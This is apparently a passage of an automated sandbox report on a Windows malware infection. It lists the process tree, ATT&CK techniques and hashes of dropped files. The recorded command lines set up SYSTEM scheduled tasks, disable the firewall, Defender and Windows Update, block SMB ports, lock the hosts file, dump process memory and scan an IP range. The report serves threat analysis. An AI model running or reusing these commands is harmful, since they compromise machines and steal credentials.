- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "qjtubdvbc" /ru system /tr "cmd /c C:\Windows\ime\tbutbbj.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "buccbntqu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:660
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "buccbntqu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mbnnkqzuc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:688
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "mbnnkqzuc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1112
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3292
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3496
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3304
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2468
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3180
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:232
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3372
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4160
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2776
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1484
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3644
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2968
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4936
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      PID:4984
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4564
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4072
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2372
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:576
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3460
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4132
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      PID:660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  - System Location Discovery: System Language Discovery
  PID:772
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    PID:4816
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:2440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  PID:4436
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    PID:5036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:4916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  PID:2980
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2632
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3044
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    PID:4972
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2620
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3872
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    PID:3784
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3996
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 808 C:\Windows\TEMP\vieiitfbt\808.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:5076
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 428 C:\Windows\TEMP\vieiitfbt\428.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2468
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 1760 C:\Windows\TEMP\vieiitfbt\1760.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3312
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2568 C:\Windows\TEMP\vieiitfbt\2568.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2004
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2696 C:\Windows\TEMP\vieiitfbt\2696.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2552
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2900 C:\Windows\TEMP\vieiitfbt\2900.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1504
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2752 C:\Windows\TEMP\vieiitfbt\2752.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1364
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3748 C:\Windows\TEMP\vieiitfbt\3748.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2020
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3876 C:\Windows\TEMP\vieiitfbt\3876.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4908
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3964 C:\Windows\TEMP\vieiitfbt\3964.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 4060 C:\Windows\TEMP\vieiitfbt\4060.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1548
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 4464 C:\Windows\TEMP\vieiitfbt\4464.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2576
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 2792 C:\Windows\TEMP\vieiitfbt\2792.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3156
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 3628 C:\Windows\TEMP\vieiitfbt\3628.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3760
- C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe
  C:\Windows\TEMP\vieiitfbt\ypdiqfiui.exe -accepteula -mp 5024 C:\Windows\TEMP\vieiitfbt\5024.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5100
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1308
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4068
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:2224
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\vieiitfbt\tbntqyuzn\scan.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1844
- - C:\Windows\vieiitfbt\tbntqyuzn\qwttvniyq.exe
    qwttvniyq.exe TCP 181.215.0.1 181.215.255.255 7001 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:456

C:\Windows\SysWOW64\ogmqci.exe
C:\Windows\SysWOW64\ogmqci.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:560

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F
1⤵
PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1300
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F
  2⤵
  PID:676

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F
1⤵
PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4012
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F
  2⤵
  PID:4156

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tbutbbj.exe
1⤵
PID:2640
- C:\Windows\ime\tbutbbj.exe
  C:\Windows\ime\tbutbbj.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2712

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F
1⤵
PID:1296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4160
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\bptuvtrj\tbutbbj.exe /p everyone:F
  2⤵
  PID:3808

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F
1⤵
PID:940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:1484
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\hnmbtkiin\iakeqk.exe /p everyone:F
  2⤵
  PID:2740

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tbutbbj.exe
1⤵
PID:864
- C:\Windows\ime\tbutbbj.exe
  C:\Windows\ime\tbutbbj.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\SysWOW64\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\TEMP\hnmbtkiin\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\vieiitfbt\1760.dmp

Filesize
4.1MB

MD5
71f80b39abdede9fad76a209833e6cc3

SHA1
c627f963906898c0be58e338ee4ff35117d2aa1f

SHA256
ff649b4a6d95a2fc32c17493ddb9698553605b741db11cddd06b22bde1fc8f6c

SHA512
e2d8ba8e2a0f0a8bc39d9c0a8031722522edf4c5656e355cd238e1818a9bec380b5b8249df948e792e2c13fb69a520f6dc2a394266bd3a9845b9349f7f63868f

Download Submit
C:\Windows\TEMP\vieiitfbt\2568.dmp

Filesize
3.9MB

MD5
2706ecba79118e8be320ba8fe8a00855

SHA1
5fddc24acf0938eba5e32a681f6c4b0bf09f4ab0

SHA256
cb42f22f1a2cc053e70f6919368220645dae231ebf93fe705968757e201f0ec2

SHA512
5da567cb7db99d439f680b8f83ad4a74dec2520bfe61794de8042f50469ff80b136ba1cb7ae98b8d61374d67e74310ab18aad2f79252c1dd124e242dcf2a4f7a

Download Submit
C:\Windows\TEMP\vieiitfbt\2696.dmp

Filesize
7.6MB

MD5
f404154db347ed678d428992ba516569

SHA1
1d71618a1f3376bdb2920c457281a500145f5fb1

SHA256
e25737425f51adfd976c6fb8ca65db53d4fceb38d2884313f61998000b29dee6

SHA512
208942d1a74f3dd6470c105f98bd0ba6ccdc9415c33bb73b09aa2406fada32c511b9827e94448e232c3732e6851131c6b114603326cbc25934d424157db710ef

Download Submit
C:\Windows\TEMP\vieiitfbt\2752.dmp

Filesize
810KB

MD5
8dd77815dab971d0b77776a67cf02263

SHA1
ae57b94bd9cc832d3043a01da94a7bf3ad0090bd

SHA256
0b74741318bd8fecda228b716ff0bdad66dc2be094dc85a2468385cc5c059112

SHA512
9fc0c09f40bb0ffc2e327b8b0f15d8539493437955ead0f6c3f16943db559bc94d874cd5d28db01027a3b99ffdf69a473702c884fc3afe88c8781fb9a9f37aa1

Download Submit
C:\Windows\TEMP\vieiitfbt\2792.dmp

Filesize
1.2MB

MD5
c1d29ebc93cecd7fb660691fcc32045c

SHA1
671d8134c57dd03efcdb68599bdc4edb9911d7ce

SHA256
18d61c1836738bf716635a1e96017248a602697f27943a8d9d86f3838865a528

SHA512
e50b0db2a99a6b586a57da7fe9c3dfd4b057c17d6ece49801b684f7bf862d74bbfd5f9fb0729ecccbc5990226ab93539f7b3d4bd5ab436b1190d421a71776e38

Download Submit
C:\Windows\TEMP\vieiitfbt\2900.dmp

Filesize
3.0MB

MD5
968f9bf5923ea5a178bd82e410e058ae

SHA1
1dfcb043bde91a06cf86f79eef91feb23c3e1aff

SHA256
da57d2048c412777977dd5bae620707fd99da1d6fecfb7d9b7d8d1653fffb676

SHA512
f9347dadecb378ac9f425047e066a1e4e4178bbdde850a21be86e9c813e95ebd6e65d7bff02cd5fdab4f806ad4f8d7fe84a6108563513c3dd69cfe576852549c

Download Submit
C:\Windows\TEMP\vieiitfbt\3628.dmp

Filesize
8.5MB

MD5
fc0872862fe73abb1a6521c107c08377

SHA1
f7163a789c8f48e26a4d923f88b64e6e1261660b

SHA256
974581732efd5e3c75718f4ad029acabb0252f85c2844e32c52dfb5c0b489266

SHA512
5e554333e843384d4bd6c2f7041857f2307206dd7e078a5eced18e6af4535b6e1242ba02cd7b59a0708f1a3b1668c20071f309d4624ffff099ffabd1e8fa94d0

Download Submit
C:\Windows\TEMP\vieiitfbt\3748.dmp

Filesize
2.7MB

MD5
15c3a4b4b6795fcee94192c9c26c1a55

SHA1
803b7fd3679d535ec57975a0d7d93d011edee6d2

SHA256
73e565752042a5eb7ad5715557da1041733a630bec25ed26112a25c0464a5745

SHA512
a292d00a530a2ec5c1ede2d3dacd6720af339a33f44fd44cea1c122ff7fb03dea7cec588de62d18ec1e11b46a70100a79a86090963d4813b1e6a38d8cc5b7090

Download Submit
C:\Windows\TEMP\vieiitfbt\3876.dmp

Filesize
21.1MB

MD5
8dfe521557732d764060fd7013f19f2e

SHA1
4a2d9d3d75e017e939627377ffab885a1bc31347

SHA256
3904b26cde66c06da9d74d6c2dd7a74cc77e3911838a5a46dbcd4dd1b72feee8

SHA512
138ac58bd12dcc5bf94a7853a60411f763db653c256d65264bcb5a6eaaba8d33c0413cb0d4ad927116773189c9660a5b7e950ab323943e6aeabd5f77fbf1a025

Download Submit
C:\Windows\TEMP\vieiitfbt\3964.dmp

Filesize
4.0MB

MD5
5a5e199c1274673ecbbe63798e242adc

SHA1
a297b67889027e74a58cf7e40351cada79c69185

SHA256
b195960bad0394297bdf62080be5b428eb8a612078a6261d99bec5ec3f4d7bb0

SHA512
07221f386450a1793f52718289302815ea6265ebb71b700c88d2b6bca1ad322b20f7561a71880458f619ae962d4cdc3293a7dcd857d0e706cd9e2cd1300d14ad

Download Submit
C:\Windows\TEMP\vieiitfbt\4060.dmp

Filesize
44.1MB

MD5
c8b01d92e68f37b658f73e8158cc50de

SHA1
aab1fa7ab9545a8c9c83533ae00ec9ab60b24da1

SHA256
f0fff82a4531595d83e6758823df2e2daa3f891a9213a44547a6aaeb30b871b0

SHA512
68bcdba41ccbf39ee6d5039bc406e3ec8af284f8cefc70308ecc92232f56874e4c545f34793b74286ad632f49dddb9b3d8fc66f8b0dd32dc8c38a394e7e0076a

Download Submit
C:\Windows\TEMP\vieiitfbt\428.dmp

Filesize
33.3MB

MD5
3300536868d0124d8318ecdb5737a75a

SHA1
09d2e093d27526ede0e3bf094cac8f79e12b075d

SHA256
6a8049c4ad9b0de05799f8188d5cbd0abfc57046ecf1df27364ff3975fd928c5

SHA512
08dcc4bbbba806ae07e0bd583056bc608acb8cb2142e4ca4745df843b72b67228f3a6688644d836ed29e43708cd71c3b880ad446ec9efd18ac9b20c329449411

Download Submit
C:\Windows\TEMP\vieiitfbt\4464.dmp

Filesize
25.8MB

MD5
dde71d26ea357a576c3f0642c3103f13

SHA1
ef782ae3a32fb0a1b683a5120124e5da710bbb26

SHA256
19bae693d4194b740981719b1dcc0673b4378e9592252f355f9939108d4afea7

SHA512
0aaf05148acec60aef28e6d8b002e1a15aea64835a122f7ded094a871b466949c697af5b50f741dc07e6a9099f2e2ce9cd46c4525828fbab4d2975f35e9e3f78

Download Submit
C:\Windows\TEMP\vieiitfbt\808.dmp

Filesize
1019KB

MD5
3b3089d76b5a615c05b5c7b1a24fb23c

SHA1
bceb4ae44dfd8081351d2d5f267a299d0f1aa9ba

SHA256
aff933ae8b0795eb822b87df5cecbad1eb43ed35589c576283ae5075a6ce3e44

SHA512
048e154f7a581b5bbd4969aa3f6da3f343b7d7f729d0fefa54943a0d44c60b83fd6b09778e25b5ce45aac148420d1b1eaff537be8cd424371ddd2aa18e981f45

Download Submit
C:\Windows\TEMP\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\Temp\hnmbtkiin\iakeqk.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\nsxFE67.tmp\System.dll

Filesize
11KB

MD5
2ae993a2ffec0c137eb51c8832691bcb

SHA1
98e0b37b7c14890f8a599f35678af5e9435906e1

SHA256
681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59

SHA512
2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9

Download Submit
C:\Windows\Temp\nsxFE67.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
C:\Windows\Temp\vieiitfbt\ypdiqfiui.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\bptuvtrj\tbutbbj.exe

Filesize
10.6MB

MD5
db73ff2ba9bfc31db16f023121b3cd4a

SHA1
47788e0cc08d7d47092b38e40192c362f7838d0a

SHA256
de1234e4bfbf09a9a8d2f4e231a7b26de9bc1d836954005f9b4ada2889653a06

SHA512
acbcb5e97dde30f63e3a342ee74bd376728832c265741524cb81a41d99be15634e10f8bef2881ae09d3a11ca4c05052cb86b9310dabf10be40dd365eaa3536b6

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\vieiitfbt\Corporate\vfshost.exe

